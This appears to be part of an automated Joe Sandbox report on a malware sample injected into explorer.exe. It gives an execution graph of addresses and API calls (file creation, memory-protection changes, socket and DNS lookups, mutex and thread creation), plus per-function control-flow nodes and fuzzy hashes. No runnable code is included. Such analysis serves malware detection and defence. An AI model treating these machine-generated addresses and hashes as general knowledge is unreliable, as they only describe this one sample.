                                                                                                                                                  execution_graph 13808 e570cd4 13810 e570cd8 13808->13810 13809 e571022 13810->13809 13814 e570352 13810->13814 13812 e570f0d 13812->13809 13823 e570792 13812->13823 13816 e57039e 13814->13816 13815 e57058e 13815->13812 13816->13815 13817 e5704ec 13816->13817 13819 e570595 13816->13819 13818 e576232 NtCreateFile 13817->13818 13821 e5704ff 13818->13821 13819->13815 13820 e576232 NtCreateFile 13819->13820 13820->13815 13821->13815 13822 e576232 NtCreateFile 13821->13822 13822->13815 13824 e5707e0 13823->13824 13825 e576232 NtCreateFile 13824->13825 13827 e57090c 13825->13827 13826 e570af3 13826->13812 13827->13826 13828 e570352 NtCreateFile 13827->13828 13829 e570602 NtCreateFile 13827->13829 13828->13827 13829->13827 13508 e577e12 13512 e576942 13508->13512 13510 e577e45 NtProtectVirtualMemory 13511 e577e70 13510->13511 13513 e576967 13512->13513 13513->13510 13772 e56c613 13773 e56c620 13772->13773 13774 e56c684 13773->13774 13775 e577e12 NtProtectVirtualMemory 13773->13775 13775->13773 13776 e578a1f 13777 e578a25 13776->13777 13780 e56c5f2 13777->13780 13779 e578a3d 13781 e56c60e 13780->13781 13782 e56c5fb 13780->13782 13781->13779 13782->13781 13783 e571662 2 API calls 13782->13783 13783->13781 13531 e56b2dd 13532 e56b31a 13531->13532 13533 e56b3fa 13532->13533 13534 e56b328 SleepEx 13532->13534 13538 e575f12 13532->13538 13547 e56c432 13532->13547 13557 e56b0f2 13532->13557 13534->13532 13534->13534 13541 e575f48 13538->13541 13539 e576134 13539->13532 13540 e576232 NtCreateFile 13540->13541 13541->13539 13541->13540 13542 e5760e9 13541->13542 13563 e576f82 13541->13563 13544 e576125 13542->13544 13569 e575842 13542->13569 13577 e575922 13544->13577 13548 e56c45b 13547->13548 13556 e56c4c9 13547->13556 13549 e576232 NtCreateFile 13548->13549 13548->13556 13550 e56c496 13549->13550 13551 e56c4c5 13550->13551 13589 e56c082 13550->13589 13553 e576232 NtCreateFile 13551->13553 13551->13556 13553->13556 13554 e56c4b6 13554->13551 13598 e56bf52 13554->13598 13556->13532 13558 e56b1d3 13557->13558 13559 e56b109 13557->13559 13558->13532 13603 e56b012 13559->13603 13561 e56b113 13561->13558 13562 e576f82 2 API calls 13561->13562 13562->13558 13564 e576fb8 13563->13564 13565 e5735b2 socket 13564->13565 13566 e577081 13564->13566 13568 e577022 13564->13568 13565->13566 13567 e577117 getaddrinfo 13566->13567 13566->13568 13567->13568 13568->13541 13570 e57586d 13569->13570 13585 e576232 13570->13585 13572 e575906 13572->13542 13573 e575888 13573->13572 13574 e576f82 2 API calls 13573->13574 13575 e5758c5 13573->13575 13574->13575 13575->13572 13576 e576232 NtCreateFile 13575->13576 13576->13572 13578 e5759c2 13577->13578 13579 e576232 NtCreateFile 13578->13579 13583 e5759d6 13579->13583 13580 e575a9f 13580->13539 13581 e575a5d 13581->13580 13582 e576232 NtCreateFile 13581->13582 13582->13580 13583->13580 13583->13581 13584 e576f82 2 API calls 13583->13584 13584->13581 13586 e57625c 13585->13586 13588 e576334 13585->13588 13587 e576410 NtCreateFile 13586->13587 13586->13588 13587->13588 13588->13573 13590 e56c420 13589->13590 13591 e56c0aa 13589->13591 13590->13554 13591->13590 13592 e576232 NtCreateFile 13591->13592 13593 e56c1f9 13592->13593 13594 e576232 NtCreateFile 13593->13594 13597 e56c3df 13593->13597 13595 e56c3c9 13594->13595 13596 e576232 NtCreateFile 13595->13596 13596->13597 13597->13554 13599 e56bf70 13598->13599 13600 e56bf84 13598->13600 13599->13551 13601 e576232 NtCreateFile 13600->13601 13602 e56c046 13601->13602 13602->13551 13605 e56b031 13603->13605 13604 e56b0cd 13604->13561 13605->13604 13606 e576f82 2 API calls 13605->13606 13606->13604 13830 e56eedd 13832 e56ef06 13830->13832 13831 e56efa4 13832->13831 13833 e56b8f2 NtProtectVirtualMemory 13832->13833 13834 e56ef9c 13833->13834 13835 e572382 ObtainUserAgentString 13834->13835 13835->13831 13930 e56edd9 13931 e56edf0 13930->13931 13932 e572382 ObtainUserAgentString 13931->13932 13933 e56eecd 13931->13933 13932->13933 13522 e576f82 13523 e576fb8 13522->13523 13525 e577081 13523->13525 13527 e577022 13523->13527 13528 e5735b2 13523->13528 13526 e577117 getaddrinfo 13525->13526 13525->13527 13526->13527 13529 e5735ec 13528->13529 13530 e57360a socket 13528->13530 13529->13530 13530->13525 13753 e578a4d 13754 e578a53 13753->13754 13757 e56c782 13754->13757 13756 e578a6b 13758 e56c78f 13757->13758 13759 e56c7ad 13758->13759 13761 e571662 13758->13761 13759->13756 13762 e57166b 13761->13762 13768 e5717ba 13761->13768 13763 e56b0f2 2 API calls 13762->13763 13762->13768 13765 e5716ee 13763->13765 13764 e571750 13767 e57183f 13764->13767 13764->13768 13770 e571791 13764->13770 13765->13764 13766 e576f82 2 API calls 13765->13766 13766->13764 13767->13768 13769 e576f82 2 API calls 13767->13769 13768->13759 13769->13768 13770->13768 13771 e576f82 2 API calls 13770->13771 13771->13768 13784 e577e0a 13785 e577e45 NtProtectVirtualMemory 13784->13785 13786 e576942 13784->13786 13787 e577e70 13785->13787 13786->13785 13900 e57014a 13901 e570153 13900->13901 13906 e570174 13900->13906 13902 e572382 ObtainUserAgentString 13901->13902 13904 e57016c 13902->13904 13903 e5701e7 13905 e56b0f2 2 API calls 13904->13905 13905->13906 13906->13903 13908 e56b1f2 13906->13908 13909 e56b20f 13908->13909 13913 e56b2c9 13908->13913 13910 e575f12 3 API calls 13909->13910 13912 e56b242 13909->13912 13910->13912 13911 e56b289 13911->13913 13915 e56b0f2 2 API calls 13911->13915 13912->13911 13914 e56c432 NtCreateFile 13912->13914 13913->13906 13914->13911 13915->13913 13836 e56f2f4 13837 e56f349 13836->13837 13838 e56f49f 13837->13838 13840 e56b8f2 NtProtectVirtualMemory 13837->13840 13839 e56b8f2 NtProtectVirtualMemory 13838->13839 13843 e56f4c3 13838->13843 13839->13843 13841 e56f480 13840->13841 13842 e56b8f2 NtProtectVirtualMemory 13841->13842 13842->13838 13844 e56b8f2 NtProtectVirtualMemory 13843->13844 13845 e56f597 13843->13845 13844->13845 13846 e56b8f2 NtProtectVirtualMemory 13845->13846 13847 e56f5bf 13845->13847 13846->13847 13850 e56b8f2 NtProtectVirtualMemory 13847->13850 13851 e56f6b9 13847->13851 13848 e56f6e1 13849 e572382 ObtainUserAgentString 13848->13849 13852 e56f6e9 13849->13852 13850->13851 13851->13848 13853 e56b8f2 NtProtectVirtualMemory 13851->13853 13853->13848 13950 e5789b3 13951 e5789bd 13950->13951 13954 e56d6d2 13951->13954 13953 e5789e0 13955 e56d6f7 13954->13955 13956 e56d704 13954->13956 13957 e56b0f2 2 API calls 13955->13957 13958 e56d6ff 13956->13958 13959 e56d72d 13956->13959 13961 e56d737 13956->13961 13957->13958 13958->13953 13963 e5732c2 13959->13963 13961->13958 13962 e576f82 2 API calls 13961->13962 13962->13958 13964 e5732df 13963->13964 13965 e5732cb 13963->13965 13964->13958 13965->13964 13966 e5730c2 2 API calls 13965->13966 13966->13964 13514 e576232 13515 e57625c 13514->13515 13517 e576334 13514->13517 13516 e576410 NtCreateFile 13515->13516 13515->13517 13516->13517 13934 e5789f1 13935 e5789f7 13934->13935 13938 e56d852 13935->13938 13937 e578a0f 13939 e56d8e4 13938->13939 13940 e56d865 13938->13940 13939->13937 13940->13939 13942 e56d887 13940->13942 13944 e56d87e 13940->13944 13941 e57336f 13941->13937 13942->13939 13943 e571662 2 API calls 13942->13943 13943->13939 13944->13941 13945 e5730c2 2 API calls 13944->13945 13945->13941 13854 e56b0f1 13855 e56b109 13854->13855 13859 e56b1d3 13854->13859 13856 e56b012 2 API calls 13855->13856 13857 e56b113 13856->13857 13858 e576f82 2 API calls 13857->13858 13857->13859 13858->13859 13946 e56c5f1 13947 e56c606 13946->13947 13948 e56c60e 13946->13948 13949 e571662 2 API calls 13947->13949 13949->13948 13884 e5718be 13886 e5718c3 13884->13886 13885 e5719a6 13886->13885 13887 e571995 ObtainUserAgentString 13886->13887 13887->13885 13967 e56efbf 13969 e56f016 13967->13969 13968 e56f0f0 13969->13968 13972 e56b8f2 NtProtectVirtualMemory 13969->13972 13973 e56f0bb 13969->13973 13970 e56f0e8 13971 e572382 ObtainUserAgentString 13970->13971 13971->13968 13972->13973 13973->13970 13974 e56b8f2 NtProtectVirtualMemory 13973->13974 13974->13970 13788 e57583a 13789 e575841 13788->13789 13790 e576f82 2 API calls 13789->13790 13792 e5758c5 13790->13792 13791 e575906 13792->13791 13793 e576232 NtCreateFile 13792->13793 13793->13791 13860 e56f0fb 13862 e56f137 13860->13862 13861 e56f2d5 13862->13861 13863 e56b8f2 NtProtectVirtualMemory 13862->13863 13864 e56f28a 13863->13864 13865 e56b8f2 NtProtectVirtualMemory 13864->13865 13868 e56f2a9 13865->13868 13866 e56f2cd 13867 e572382 ObtainUserAgentString 13866->13867 13867->13861 13868->13866 13869 e56b8f2 NtProtectVirtualMemory 13868->13869 13869->13866 13920 e576f7a 13921 e576fb8 13920->13921 13922 e5735b2 socket 13921->13922 13923 e577081 13921->13923 13925 e577022 13921->13925 13922->13923 13924 e577117 getaddrinfo 13923->13924 13923->13925 13924->13925 13888 e5730b9 13889 e5730ed 13888->13889 13891 e5731f0 13888->13891 13890 e576f82 2 API calls 13889->13890 13889->13891 13890->13891 13926 e56db66 13928 e56db6a 13926->13928 13927 e56dcce 13928->13927 13929 e56dcb5 CreateMutexExW 13928->13929 13929->13927 13870 e5732e4 13871 e57336f 13870->13871 13872 e573305 13870->13872 13872->13871 13874 e5730c2 13872->13874 13875 e5730cb 13874->13875 13877 e5731f0 13874->13877 13876 e576f82 2 API calls 13875->13876 13875->13877 13876->13877 13877->13871 13878 e570ce2 13880 e570dd9 13878->13880 13879 e571022 13880->13879 13881 e570352 NtCreateFile 13880->13881 13882 e570f0d 13881->13882 13882->13879 13883 e570792 NtCreateFile 13882->13883 13883->13882 13794 e56c42e 13795 e56c45b 13794->13795 13802 e56c4c9 13794->13802 13796 e576232 NtCreateFile 13795->13796 13795->13802 13797 e56c496 13796->13797 13798 e56c4c5 13797->13798 13799 e56c082 NtCreateFile 13797->13799 13800 e576232 NtCreateFile 13798->13800 13798->13802 13801 e56c4b6 13799->13801 13800->13802 13801->13798 13803 e56bf52 NtCreateFile 13801->13803 13803->13798 13607 e577bac 13608 e577bb1 13607->13608 13641 e577bb6 13608->13641 13642 e56db72 13608->13642 13610 e577c2c 13611 e577c85 13610->13611 13613 e577c54 13610->13613 13614 e577c69 13610->13614 13610->13641 13612 e575ab2 NtProtectVirtualMemory 13611->13612 13617 e577c8d 13612->13617 13618 e575ab2 NtProtectVirtualMemory 13613->13618 13615 e577c80 13614->13615 13616 e577c6e 13614->13616 13615->13611 13620 e577c97 13615->13620 13619 e575ab2 NtProtectVirtualMemory 13616->13619 13678 e56f102 13617->13678 13622 e577c5c 13618->13622 13623 e577c76 13619->13623 13624 e577cbe 13620->13624 13625 e577c9c 13620->13625 13664 e56eee2 13622->13664 13670 e56efc2 13623->13670 13628 e577cc7 13624->13628 13629 e577cd9 13624->13629 13624->13641 13646 e575ab2 13625->13646 13630 e575ab2 NtProtectVirtualMemory 13628->13630 13634 e575ab2 NtProtectVirtualMemory 13629->13634 13629->13641 13633 e577ccf 13630->13633 13688 e56f2f2 13633->13688 13637 e577ce5 13634->13637 13706 e56f712 13637->13706 13644 e56db93 13642->13644 13643 e56dcce 13643->13610 13644->13643 13645 e56dcb5 CreateMutexExW 13644->13645 13645->13643 13648 e575adf 13646->13648 13647 e575ebc 13656 e56ede2 13647->13656 13648->13647 13718 e56b8f2 13648->13718 13650 e575e5c 13651 e56b8f2 NtProtectVirtualMemory 13650->13651 13652 e575e7c 13651->13652 13653 e56b8f2 NtProtectVirtualMemory 13652->13653 13654 e575e9c 13653->13654 13655 e56b8f2 NtProtectVirtualMemory 13654->13655 13655->13647 13657 e56edf0 13656->13657 13659 e56eecd 13657->13659 13741 e572382 13657->13741 13660 e56b412 13659->13660 13662 e56b440 13660->13662 13661 e56b473 13661->13641 13662->13661 13663 e56b44d CreateThread 13662->13663 13663->13641 13666 e56ef06 13664->13666 13665 e56efa4 13665->13641 13666->13665 13667 e56b8f2 NtProtectVirtualMemory 13666->13667 13668 e56ef9c 13667->13668 13669 e572382 ObtainUserAgentString 13668->13669 13669->13665 13672 e56f016 13670->13672 13671 e56f0f0 13671->13641 13672->13671 13675 e56b8f2 NtProtectVirtualMemory 13672->13675 13676 e56f0bb 13672->13676 13673 e56f0e8 13674 e572382 ObtainUserAgentString 13673->13674 13674->13671 13675->13676 13676->13673 13677 e56b8f2 NtProtectVirtualMemory 13676->13677 13677->13673 13680 e56f137 13678->13680 13679 e56f2d5 13679->13641 13680->13679 13681 e56b8f2 NtProtectVirtualMemory 13680->13681 13682 e56f28a 13681->13682 13683 e56b8f2 NtProtectVirtualMemory 13682->13683 13686 e56f2a9 13683->13686 13684 e56f2cd 13685 e572382 ObtainUserAgentString 13684->13685 13685->13679 13686->13684 13687 e56b8f2 NtProtectVirtualMemory 13686->13687 13687->13684 13691 e56f349 13688->13691 13689 e56f49f 13690 e56b8f2 NtProtectVirtualMemory 13689->13690 13695 e56f4c3 13689->13695 13690->13695 13691->13689 13692 e56b8f2 NtProtectVirtualMemory 13691->13692 13693 e56f480 13692->13693 13694 e56b8f2 NtProtectVirtualMemory 13693->13694 13694->13689 13696 e56b8f2 NtProtectVirtualMemory 13695->13696 13697 e56f597 13695->13697 13696->13697 13698 e56b8f2 NtProtectVirtualMemory 13697->13698 13699 e56f5bf 13697->13699 13698->13699 13702 e56b8f2 NtProtectVirtualMemory 13699->13702 13703 e56f6b9 13699->13703 13700 e56f6e1 13701 e572382 ObtainUserAgentString 13700->13701 13704 e56f6e9 13701->13704 13702->13703 13703->13700 13705 e56b8f2 NtProtectVirtualMemory 13703->13705 13704->13641 13705->13700 13707 e56f767 13706->13707 13708 e56f903 13707->13708 13709 e56b8f2 NtProtectVirtualMemory 13707->13709 13715 e56b8f2 NtProtectVirtualMemory 13708->13715 13716 e56f992 13708->13716 13710 e56f8e3 13709->13710 13711 e56b8f2 NtProtectVirtualMemory 13710->13711 13711->13708 13712 e56f9b7 13713 e572382 ObtainUserAgentString 13712->13713 13714 e56f9bf 13713->13714 13714->13641 13715->13716 13716->13712 13717 e56b8f2 NtProtectVirtualMemory 13716->13717 13717->13712 13719 e56b987 13718->13719 13722 e56b9b2 13719->13722 13733 e56c622 13719->13733 13721 e56bc0c 13721->13650 13722->13721 13723 e56bba2 13722->13723 13725 e56bac5 13722->13725 13724 e577e12 NtProtectVirtualMemory 13723->13724 13732 e56bb5b 13724->13732 13737 e577e12 13725->13737 13727 e577e12 NtProtectVirtualMemory 13727->13721 13728 e56bae3 13728->13721 13729 e56bb3d 13728->13729 13730 e577e12 NtProtectVirtualMemory 13728->13730 13731 e577e12 NtProtectVirtualMemory 13729->13731 13730->13729 13731->13732 13732->13721 13732->13727 13734 e56c67a 13733->13734 13735 e577e12 NtProtectVirtualMemory 13734->13735 13736 e56c684 13734->13736 13735->13734 13736->13722 13738 e576942 13737->13738 13739 e577e45 NtProtectVirtualMemory 13738->13739 13740 e577e70 13739->13740 13740->13728 13742 e5723c7 13741->13742 13745 e572232 13742->13745 13744 e572438 13744->13659 13746 e57225e 13745->13746 13749 e5718c2 13746->13749 13748 e57226b 13748->13744 13750 e571934 13749->13750 13751 e5719a6 13750->13751 13752 e571995 ObtainUserAgentString 13750->13752 13751->13748 13752->13751 13804 e57222a 13805 e57225e 13804->13805 13806 e5718c2 ObtainUserAgentString 13805->13806 13807 e57226b 13806->13807 13892 e578aa9 13893 e578aaf 13892->13893 13896 e573212 13893->13896 13895 e578ac7 13897 e573237 13896->13897 13898 e57321b 13896->13898 13897->13895 13898->13897 13899 e5730c2 2 API calls 13898->13899 13899->13897

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0E576232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 291 e576232-e576256 292 e5768bd-e5768cd 291->292 293 e57625c-e576260 291->293 293->292 294 e576266-e5762a0 293->294 295 e5762a2-e5762a6 294->295 296 e5762bf 294->296 295->296 297 e5762a8-e5762ac 295->297 298 e5762c6 296->298 299 e5762b4-e5762b8 297->299 300 e5762ae-e5762b2 297->300 301 e5762cb-e5762cf 298->301 299->301 302 e5762ba-e5762bd 299->302 300->298 303 e5762d1-e5762f7 call e576942 301->303 304 e5762f9-e57630b 301->304 302->301 303->304 308 e576378 303->308 304->308 309 e57630d-e576332 304->309 312 e57637a-e5763a0 308->312 310 e576334-e57633b 309->310 311 e5763a1-e5763a8 309->311 313 e576366-e576370 310->313 314 e57633d-e576360 call e576942 310->314 315 e5763d5-e5763dc 311->315 316 e5763aa-e5763d3 call e576942 311->316 313->308 320 e576372-e576373 313->320 314->313 317 e576410-e576458 NtCreateFile call e576172 315->317 318 e5763de-e57640a call e576942 315->318 316->308 316->315 327 e57645d-e57645f 317->327 318->308 318->317 320->308 327->308 328 e576465-e57646d 327->328 328->308 329 e576473-e576476 328->329 330 e576486-e57648d 329->330 331 e576478-e576481 329->331 332 e5764c2-e5764ec 330->332 333 e57648f-e5764b8 call e576942 330->333 331->312 339 e5764f2-e5764f5 332->339 340 e5768ae-e5768b8 332->340 333->308 338 e5764be-e5764bf 333->338 338->332 341 e576604-e576611 339->341 342 e5764fb-e5764fe 339->342 340->308 341->312 343 e576500-e576507 342->343 344 e57655e-e576561 342->344 347 e576509-e576532 call e576942 343->347 348 e576538-e576559 343->348 349 e576567-e576572 344->349 350 e576616-e576619 344->350 347->308 347->348 354 e5765e9-e5765fa 348->354 355 e576574-e57659d call e576942 349->355 356 e5765a3-e5765a6 349->356 352 e57661f-e576626 350->352 353 e5766b8-e5766bb 350->353 361 e576657-e57666b call e577e92 352->361 362 e576628-e576651 call e576942 352->362 358 e5766bd-e5766c4 353->358 359 e576739-e57673c 353->359 354->341 355->308 355->356 356->308 357 e5765ac-e5765b6 356->357 357->308 365 e5765bc-e5765e6 357->365 366 e5766c6-e5766ef call e576942 358->366 367 e5766f5-e576734 358->367 369 e5767c4-e5767c7 359->369 370 e576742-e576749 359->370 361->308 379 e576671-e5766b3 361->379 362->308 362->361 365->354 366->340 366->367 389 e576894-e5768a9 367->389 369->308 375 e5767cd-e5767d4 369->375 372 e57674b-e576774 call e576942 370->372 373 e57677a-e5767bf 370->373 372->340 372->373 373->389 380 e5767d6-e5767f6 call e576942 375->380 381 e5767fc-e576803 375->381 379->312 380->381 387 e576805-e576825 call e576942 381->387 388 e57682b-e576835 381->388 387->388 388->340 390 e576837-e57683e 388->390 389->312 390->340 394 e576840-e576886 390->394 394->389
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: `
                                                                                                                                                  • API String ID: 823142352-2679148245
                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction ID: 535ef9a8030c72388cad70893578240b6cbcd1054762666bb5505635cc558cc3
                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction Fuzzy Hash: 6B222F70A18E099FCB59DF28D4956BAF7F1FB98301F404A2ED49ED7250DB70A851CB82
                                                                                                                                                  Function 0E577E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 430 e577e12-e577e6e call e576942 NtProtectVirtualMemory 433 e577e70-e577e7c 430->433 434 e577e7d-e577e8f 430->434
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E577E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction ID: d66a725451db823e7332952667f184b12cefc7bef0d330cc9e2e8827a7ff6fb4
                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction Fuzzy Hash: 48019230628B484F8784EF6CA480126B7E4FBCD215F000B3EA99AC3250D760C9414742
                                                                                                                                                  Function 0E577E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 435 e577e0a-e577e38 436 e577e45-e577e6e NtProtectVirtualMemory 435->436 437 e577e40 call e576942 435->437 438 e577e70-e577e7c 436->438 439 e577e7d-e577e8f 436->439 437->436
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E577E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction ID: a4067ed67b6ad7ecfeb5de7c9585a6cb811c82052bcf8bac6681283551344274
                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction Fuzzy Hash: 6A01A734628B884F8744EB3C94412A6B7E5FBCE314F000B7EE9DAC3240DB61D9014782
                                                                                                                                                  Function 0E56B412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 440 e56b412-e56b446 call e576942 443 e56b473-e56b47d 440->443 444 e56b448-e56b472 call e578c9e CreateThread 440->444
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                  • Instruction ID: 72a71961bf9d9d28d8026c6ef3e1018e4ccf7e24f37feb9a63a5843dcf4a0e54
                                                                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                  • Instruction Fuzzy Hash: 97F0F630268E494FD788EF2CD44563AF3D0FBE8215F440A3EE68DC7264DA79C9828716